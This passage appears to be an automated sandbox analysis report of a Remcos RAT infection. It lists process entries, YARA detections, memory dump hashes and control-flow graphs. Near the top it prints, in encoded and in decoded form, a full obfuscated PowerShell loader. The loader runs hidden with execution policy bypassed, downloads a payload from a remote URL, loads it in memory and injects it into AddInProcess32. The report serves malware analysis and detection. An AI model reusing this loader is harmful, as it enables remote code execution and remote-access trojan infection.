                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRFblY6Y09tU1BlY1s0LDE1LDI1XS1KT0lOJycpKCAoJ1NIc3VybCAnKyc9JysnIDNkS2h0JysndCcrJ3BzOicrJy8vJysncmEnKyd3LmdpdGgnKyd1YnVzZScrJ3Jjb250ZW50LmNvbS9Ob0QnKydldCcrJ2VjdE9uL05vRGUnKyd0ZWN0T24vcmVmcy9oZWFkcy9tYWluL0RldCcrJ2FoTm90aC1WLicrJ3QnKyd4JysndDNkSycrJzsgJysnU0hzJysnYmFzZTY0Q29udGUnKydudCA9ICcrJyhOZXctTycrJ2JqZScrJ2N0JysnICcrJ1MnKyd5c3RlJysnbS5OZScrJ3QuV2ViQ2xpZW50KS5EbycrJ3dubG9hZFN0cmluZyhTSHN1cmwnKycpOyAnKydTSHNiaW5hcnknKydDb250JysnZW50ID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0JysncmluZyhTSHMnKydiYXNlNicrJzQnKydDb250ZW50KTsnKycgU0hzYXNzZW1iJysnbHkgPSBbUicrJ2VmbGVjJysndGlvbi5Bc3NlbWJseV06OicrJ0xvYWQoU0hzJysnYicrJ2luYScrJ3J5Q29udCcrJ2VudCk7JysnIFtkbmxpYi5JTy5IJysnb21lXTo6VkFJKGVXJysnQTAvSlU0YmYvZC9lZScrJy4nKydldHNhcC8vOnNwdHQnKydoZVdBLCAnKydlJysnV0FkJysnZXNhdGl2YWRvZScrJ1dBLCBlV0FkZXNhdGknKyd2YWQnKydvZVdBLCBlJysnV0FkZXNhdCcrJ2l2YWRvZVdBLCBlJysnV0FBZCcrJ2RJblByb2Nlc3MzJysnMmVXQSwgZScrJ1cnKydBZVdBLGVXQWUnKydXQSknKS5yRXBsYWNFKChbY0hBcl0xMDErW2NIQXJdODcrW2NIQXJdNjUpLFtzVHJJbmddW2NIQXJdMzQpLnJFcGxhY0UoJ1NIcycsW3NUckluZ11bY0hBcl0zNikuckVwbGFjRSgoW2NIQXJdNTErW2NIQXJdMTAwK1tjSEFyXTc1KSxbc1RySW5nXVtjSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                  Imagebase:0x7ff7be880000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:7
                                                                                                  Start time:08:52:21
                                                                                                  Start date:07/10/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  Target ID:8
                                                                                                  Start time:08:52:21
                                                                                                  Start date:07/10/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $EnV:cOmSPec[4,15,25]-JOIN'')( ('SHsurl '+'='+' 3dKht'+'t'+'ps:'+'//'+'ra'+'w.gith'+'ubuse'+'rcontent.com/NoD'+'et'+'ectOn/NoDe'+'tectOn/refs/heads/main/Det'+'ahNoth-V.'+'t'+'x'+'t3dK'+'; '+'SHs'+'base64Conte'+'nt = '+'(New-O'+'bje'+'ct'+' '+'S'+'yste'+'m.Ne'+'t.WebClient).Do'+'wnloadString(SHsurl'+'); '+'SHsbinary'+'Cont'+'ent = [System.Convert]::From'+'Ba'+'se64St'+'ring(SHs'+'base6'+'4'+'Content);'+' SHsassemb'+'ly = [R'+'eflec'+'tion.Assembly]::'+'Load(SHs'+'b'+'ina'+'ryCont'+'ent);'+' [dnlib.IO.H'+'ome]::VAI(eW'+'A0/JU4bf/d/ee'+'.'+'etsap//:sptt'+'heWA, '+'e'+'WAd'+'esativadoe'+'WA, eWAdesati'+'vad'+'oeWA, e'+'WAdesat'+'ivadoeWA, e'+'WAAd'+'dInProcess3'+'2eWA, e'+'W'+'AeWA,eWAe'+'WA)').rEplacE(([cHAr]101+[cHAr]87+[cHAr]65),[sTrIng][cHAr]34).rEplacE('SHs',[sTrIng][cHAr]36).rEplacE(([cHAr]51+[cHAr]100+[cHAr]75),[sTrIng][cHAr]39) )"
                                                                                                  Imagebase:0x7ff7be880000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2331620773.000002001007E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.2331620773.000002001007E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2331620773.000002001111A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.2331620773.000002001111A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:10
                                                                                                  Start time:08:52:26
                                                                                                  Start date:07/10/2024
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                  Imagebase:0x390000
                                                                                                  File size:43'008 bytes
                                                                                                  MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:11
                                                                                                  Start time:08:52:26
                                                                                                  Start date:07/10/2024
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                  Imagebase:0xc40000
                                                                                                  File size:43'008 bytes
                                                                                                  MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.3435406338.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.3435406338.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.3436141535.0000000002DDF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  Reputation:moderate
                                                                                                  Has exited:false

                                                                                                  Reset < >
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2245061795.00007FF848680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848680000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7ff848680000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 05be386aa0c3291c8b531106e470a871bde7254f198c76f4435fea37d3ad2d50
                                                                                                    • Instruction ID: 9495bfbd8daf3946f79a8d1b70c4e2aa502a8d38bbd2a7e092187032313a5538
                                                                                                    • Opcode Fuzzy Hash: 05be386aa0c3291c8b531106e470a871bde7254f198c76f4435fea37d3ad2d50
                                                                                                    • Instruction Fuzzy Hash: CAD15331D0FA8A5FE796AB2858195BA7BE1FF16390F0801FAD00DC72D7EB18A845C355
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2245061795.00007FF848680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848680000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7ff848680000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5cbef1603cbac006b3a596ae6e5f5dd962bc52163083d041575b37df2c97ee9f
                                                                                                    • Instruction ID: 627aa4c43bc102543dc17d8c657c96f0df456df7f3dc41610bae5e9c43ebb0d7
                                                                                                    • Opcode Fuzzy Hash: 5cbef1603cbac006b3a596ae6e5f5dd962bc52163083d041575b37df2c97ee9f
                                                                                                    • Instruction Fuzzy Hash: E2910D21D0FBC65FE7D6AB2848695797FE1EF16690F0900FAC04DCB2DBEA189C458316
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2244702988.00007FF8485B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8485B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7ff8485b0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                    • Instruction ID: 5fce5f6e13eb1afbd7352eba8211dec14bb3d53c0b07fb6a779410d11ad73ee3
                                                                                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                    • Instruction Fuzzy Hash: 4301677111CB0C4FD748EF0CE451AA6B7E0FB95364F10056DE58AC3651D736E892CB45
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2400816511.00007FF8485C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8485C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_7ff8485c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                    • Instruction ID: e0625c02458a8535c2505aef3ae12c06990ddd56a9081b4553576dbb19ccb02d
                                                                                                    • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                    • Instruction Fuzzy Hash: E901677111CB0D4FD748EF0CE451AA6B7E0FB95364F10056DE58AC3661D736E892CB45

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:9.8%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:32
                                                                                                    Total number of Limit Nodes:2
                                                                                                    execution_graph 7582 7ff8485cbc34 7583 7ff8485cbc40 CreateProcessW 7582->7583 7585 7ff8485cbce3 7583->7585 7584 7ff8485cbd3e 7585->7584 7587 7ff8485cbd76 7585->7587 7588 7ff8485cbdb1 7587->7588 7589 7ff8485cbd9c 7587->7589 7588->7584 7589->7588 7590 7ff8485cbe8f Wow64SetThreadContext 7589->7590 7591 7ff8485cbec3 7590->7591 7591->7584 7571 7ff8485cbde5 7572 7ff8485cbdf3 Wow64SetThreadContext 7571->7572 7574 7ff8485cbec3 7572->7574 7575 7ff8485cacc5 7578 7ff8485c7b08 7575->7578 7579 7ff8485c7ae0 WriteProcessMemory 7578->7579 7581 7ff8485ca802 7579->7581 7592 7ff8485cc295 7593 7ff8485cc2a3 ResumeThread 7592->7593 7595 7ff8485cc33b 7593->7595 7596 7ff8485cb13d 7600 7ff8485c7b18 7596->7600 7598 7ff8485cb073 7598->7596 7599 7ff8485cb0be 7598->7599 7601 7ff8485c7ae0 WriteProcessMemory 7600->7601 7603 7ff8485cc261 7601->7603 7603->7598 7604 7ff8485c7b38 7605 7ff8485c7ae0 7604->7605 7605->7604 7606 7ff8485cc21a WriteProcessMemory 7605->7606 7607 7ff8485cc261 7606->7607 7616 7ff8485c7af8 7617 7ff8485c7ae0 WriteProcessMemory 7616->7617 7619 7ff8485cc261 7617->7619

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 592 7ff848692f05-7ff848692f8e 595 7ff848692f94-7ff848692f9e 592->595 596 7ff8486930fb-7ff848693111 592->596 597 7ff848692fa0-7ff848692fb1 595->597 598 7ff848692fb8-7ff848692fc2 595->598 602 7ff848693113-7ff848693117 596->602 603 7ff848693119-7ff848693132 596->603 597->598 598->596 601 7ff848692fc8-7ff848692fd2 598->601 604 7ff848692fd4-7ff848692fe9 601->604 605 7ff848692feb-7ff848692ff2 601->605 602->603 607 7ff8486931a1-7ff8486931a8 603->607 608 7ff848693134-7ff848693186 603->608 604->605 605->596 606 7ff848692ff8-7ff848693002 605->606 612 7ff848693004-7ff848693014 606->612 613 7ff848693018-7ff84869303b 606->613 610 7ff8486931b5-7ff8486931ba 607->610 611 7ff8486931aa-7ff8486931ad 607->611 622 7ff848693288-7ff848693395 608->622 623 7ff84869318c-7ff848693196 608->623 615 7ff8486931af-7ff8486931b0 610->615 620 7ff8486931bc-7ff8486931de 610->620 611->615 612->613 613->596 625 7ff848693041-7ff84869304b 613->625 615->610 620->622 627 7ff8486931e4-7ff8486931ee 620->627 663 7ff84869339d-7ff8486933b5 622->663 623->615 626 7ff848693198-7ff84869319f 623->626 628 7ff848693061-7ff84869308b 625->628 629 7ff84869304d-7ff84869305d 625->629 626->607 631 7ff8486931f0-7ff8486931fd 627->631 632 7ff848693207-7ff848693267 627->632 642 7ff848693090-7ff84869309b 628->642 629->628 631->632 639 7ff8486931ff-7ff848693205 631->639 656 7ff848693269-7ff848693277 632->656 657 7ff84869327b-7ff848693287 632->657 639->632 642->596 646 7ff84869309d-7ff8486930a7 642->646 648 7ff8486930a9-7ff8486930bc 646->648 649 7ff8486930bd-7ff8486930f8 646->649 648->649 649->596 656->657
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.2373782689.00007FF848690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848690000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ff848690000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: hy{H
                                                                                                    • API String ID: 0-809122480
                                                                                                    • Opcode ID: 2d99b2cc5e76c8a323027ba6ab70cd237652cfac53f900e894c27046363f56f9
                                                                                                    • Instruction ID: 51a3d05e6d67f4d9fa965011e4c33bb7cb9795a0107e0b10a1ea5ad3fb7a7bd5
                                                                                                    • Opcode Fuzzy Hash: 2d99b2cc5e76c8a323027ba6ab70cd237652cfac53f900e894c27046363f56f9
                                                                                                    • Instruction Fuzzy Hash: 26F1DE2190DAC54FE3CAEB3C98595713BE1EF56258F1801FEC089CB1E3DA19AC4AC346
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.2373782689.00007FF848690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848690000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ff848690000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: PT{H$PT{H
                                                                                                    • API String ID: 0-1751567777
                                                                                                    • Opcode ID: d718ce8200e30bca65d2610724609a91782bbd2ac29d73990151bfec14a8572d
                                                                                                    • Instruction ID: e91f85f20211bcca2405d64c2ddb70474d0dc8b01ebd5442a395eb48500e49d0
                                                                                                    • Opcode Fuzzy Hash: d718ce8200e30bca65d2610724609a91782bbd2ac29d73990151bfec14a8572d
                                                                                                    • Instruction Fuzzy Hash: CF63D531A1CB858FDBA5EB1C8449A65B7E1EFA9740F14469ED04CC7292DE34FC81CB86

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 518 7ff848695330-7ff848695332 519 7ff8486953a1-7ff8486953a4 518->519 520 7ff848695334-7ff848695344 518->520 523 7ff8486953a6-7ff8486953b3 519->523 524 7ff8486953bd-7ff8486953c2 519->524 521 7ff848695346-7ff848695394 520->521 522 7ff848695398-7ff84869539f 520->522 521->522 525 7ff848695583-7ff8486955dd 521->525 522->519 523->524 529 7ff8486953b5-7ff8486953bb 523->529 527 7ff848695524-7ff84869552e 524->527 528 7ff8486953c8-7ff8486953cb 524->528 549 7ff848695608-7ff848695635 525->549 550 7ff8486955df-7ff848695606 525->550 530 7ff848695530-7ff84869553c 527->530 531 7ff84869553d-7ff848695580 527->531 532 7ff8486953e2-7ff8486953e6 528->532 533 7ff8486953cd-7ff8486953d6 528->533 529->524 531->525 532->527 538 7ff8486953ec-7ff848695423 532->538 533->532 554 7ff848695425-7ff848695445 538->554 555 7ff848695447 538->555 559 7ff848695637 549->559 560 7ff848695638-7ff848695649 549->560 550->549 557 7ff848695449-7ff84869544b 554->557 555->557 557->527 562 7ff848695451-7ff848695454 557->562 559->560 563 7ff84869564b 560->563 564 7ff84869564c-7ff84869569a 560->564 566 7ff848695456-7ff848695469 562->566 567 7ff84869546b 562->567 563->564 568 7ff84869546d-7ff84869546f 566->568 567->568 568->527 571 7ff848695475-7ff8486954af 568->571 578 7ff8486954b1-7ff8486954be 571->578 579 7ff8486954c8-7ff8486954ce 571->579 578->579 584 7ff8486954c0-7ff8486954c6 578->584 581 7ff8486954d0-7ff8486954e8 579->581 582 7ff8486954ea-7ff8486954ed 579->582 581->582 585 7ff8486954f4-7ff8486954fd 582->585 584->579 587 7ff848695516-7ff848695523 585->587 588 7ff8486954ff-7ff848695514 585->588 588->587
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.2373782689.00007FF848690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848690000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ff848690000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 78ccf89d4b3bcc454bb8ecd9a16bd17c39f9185ebf13df8aae9badbf799a7353
                                                                                                    • Instruction ID: c28501846bf4eaf547c6942dc74b1a34fb0a2164a1a8cc64bdfda90961e3b98b
                                                                                                    • Opcode Fuzzy Hash: 78ccf89d4b3bcc454bb8ecd9a16bd17c39f9185ebf13df8aae9badbf799a7353
                                                                                                    • Instruction Fuzzy Hash: 90C1F221D0EBC64FE7DAAA38186D1757FE2EF56694F0800FBD04DC71E3EA08A8058316

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 665 7ff8485cbd76-7ff8485cbd9a 666 7ff8485cbdb2-7ff8485cbdba 665->666 667 7ff8485cbd9c-7ff8485cbdaf 665->667 668 7ff8485cbdd3-7ff8485cbde3 666->668 669 7ff8485cbdbc-7ff8485cbdcd 666->669 671 7ff8485cbdb1 667->671 672 7ff8485cbe0c-7ff8485cbe85 667->672 669->668 671->666 676 7ff8485cbe87-7ff8485cbe8c 672->676 677 7ff8485cbe8f-7ff8485cbec1 Wow64SetThreadContext 672->677 676->677 678 7ff8485cbec3 677->678 679 7ff8485cbec9-7ff8485cbef0 677->679 678->679
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.2372991228.00007FF8485C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8485C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ff8485c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8d2e659533c04312d649713c41e81fd8f52d3fd469fe18504ce2418a6a222b77
                                                                                                    • Instruction ID: 5e06fbcf00e36b5e02176b56b72224f085c9db5d6a7c5cedef025105003aee21
                                                                                                    • Opcode Fuzzy Hash: 8d2e659533c04312d649713c41e81fd8f52d3fd469fe18504ce2418a6a222b77
                                                                                                    • Instruction Fuzzy Hash: 3941103190CA1C8FEB59EF58EC4A7FA7BE0FB95321F04426BD049C3152DB74A8468B91

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 680 7ff8485c7b08-7ff8485c7b36 685 7ff8485c7b38-7ff8485c7b4a 680->685 687 7ff8485c7ae0-7ff8485c7ae3 685->687 688 7ff8485c7b4c-7ff8485cc210 685->688 687->685 692 7ff8485cc212-7ff8485cc217 688->692 693 7ff8485cc21a-7ff8485cc25f WriteProcessMemory 688->693 692->693 694 7ff8485cc267-7ff8485cc291 693->694 695 7ff8485cc261 693->695 695->694
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.2372991228.00007FF8485C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8485C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ff8485c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3559483778-0
                                                                                                    • Opcode ID: 04ebc77c87c7bbe9a57f6cd7a5e60ee1300d95aedb0f56369fa6df9d9a317dec
                                                                                                    • Instruction ID: 33c1ad15eb1dcb9789327d5fb597f9289e24791e6ac1bb00cc0297f0609ae42e
                                                                                                    • Opcode Fuzzy Hash: 04ebc77c87c7bbe9a57f6cd7a5e60ee1300d95aedb0f56369fa6df9d9a317dec
                                                                                                    • Instruction Fuzzy Hash: C141F331D0DB888FE718DF5CAC452B9BBE0FB56310F0542AFD089C3196DB34A8098B95

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 696 7ff8485c7b18-7ff8485c7b36 700 7ff8485c7b38-7ff8485c7b4a 696->700 702 7ff8485c7ae0-7ff8485c7ae3 700->702 703 7ff8485c7b4c-7ff8485cc210 700->703 702->700 707 7ff8485cc212-7ff8485cc217 703->707 708 7ff8485cc21a-7ff8485cc25f WriteProcessMemory 703->708 707->708 709 7ff8485cc267-7ff8485cc291 708->709 710 7ff8485cc261 708->710 710->709
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.2372991228.00007FF8485C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8485C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ff8485c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3559483778-0
                                                                                                    • Opcode ID: 07df18a21d8849e62ee0197cadf7ee5fc94aef2c290f6e89ccbf20ff4f6c05f8
                                                                                                    • Instruction ID: 57a07822e3e923c673cd38e41aa17a32e93cd493e07913986a04f7654beddaad
                                                                                                    • Opcode Fuzzy Hash: 07df18a21d8849e62ee0197cadf7ee5fc94aef2c290f6e89ccbf20ff4f6c05f8
                                                                                                    • Instruction Fuzzy Hash: 09410631D0CB488FE718DF5CAC456B97BE0FB5A711F05426FD089C3192DB34A8098B95

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 711 7ff8485c7b38-7ff8485c7b4a 713 7ff8485c7ae0-7ff8485c7ae3 711->713 714 7ff8485c7b4c-7ff8485cc210 711->714 713->711 718 7ff8485cc212-7ff8485cc217 714->718 719 7ff8485cc21a-7ff8485cc25f WriteProcessMemory 714->719 718->719 720 7ff8485cc267-7ff8485cc291 719->720 721 7ff8485cc261 719->721 721->720
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.2372991228.00007FF8485C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8485C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ff8485c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3559483778-0
                                                                                                    • Opcode ID: 7cdae281cd7d902e72b3e587014e6fb3bcbb6cbd7b2c0a371ccdbb0cc4e1c429
                                                                                                    • Instruction ID: 71cc16d4fa95f229756c3fe763b51f0d19d89b56f364190c36972b66fe40a8c8
                                                                                                    • Opcode Fuzzy Hash: 7cdae281cd7d902e72b3e587014e6fb3bcbb6cbd7b2c0a371ccdbb0cc4e1c429
                                                                                                    • Instruction Fuzzy Hash: 9B41C331D1CB488FEB18DF58A8496B9BBE0FB69311F04426FE089D3152DB74A845CB96

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 722 7ff8485cbde5-7ff8485cbdf1 723 7ff8485cbdf3-7ff8485cbdfb 722->723 724 7ff8485cbdfc-7ff8485cbe85 722->724 723->724 727 7ff8485cbe87-7ff8485cbe8c 724->727 728 7ff8485cbe8f-7ff8485cbec1 Wow64SetThreadContext 724->728 727->728 729 7ff8485cbec3 728->729 730 7ff8485cbec9-7ff8485cbef0 728->730 729->730
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.2372991228.00007FF8485C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8485C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ff8485c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextThreadWow64
                                                                                                    • String ID:
                                                                                                    • API String ID: 983334009-0
                                                                                                    • Opcode ID: 0d30988fa1766f6d0fc371a34f69a54776537852df6de71470f5ce9c99be41d0
                                                                                                    • Instruction ID: 7fb2e589d5f297408c416332dac8f12ee299e04818cfca868251a5b10730f044
                                                                                                    • Opcode Fuzzy Hash: 0d30988fa1766f6d0fc371a34f69a54776537852df6de71470f5ce9c99be41d0
                                                                                                    • Instruction Fuzzy Hash: 7241E43190CB888FDB16DF6898897E97FE0EF56320F08429BD448C7196DB64A409CB92

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 731 7ff8485cc150-7ff8485cc163 733 7ff8485cc165-7ff8485cc187 731->733 734 7ff8485cc1c1-7ff8485cc210 731->734 733->734 739 7ff8485cc212-7ff8485cc217 734->739 740 7ff8485cc21a-7ff8485cc25f WriteProcessMemory 734->740 739->740 741 7ff8485cc267-7ff8485cc291 740->741 742 7ff8485cc261 740->742 742->741
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.2372991228.00007FF8485C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8485C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ff8485c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e2603e2d9a953e6abe59df42621587d3c5c5e84f54f15050180eb223e0e36003
                                                                                                    • Instruction ID: 5cf257a2262a84a4813c5b09911a55d2f9eeab18d6d0d8a1fc086c1afe4d8c26
                                                                                                    • Opcode Fuzzy Hash: e2603e2d9a953e6abe59df42621587d3c5c5e84f54f15050180eb223e0e36003
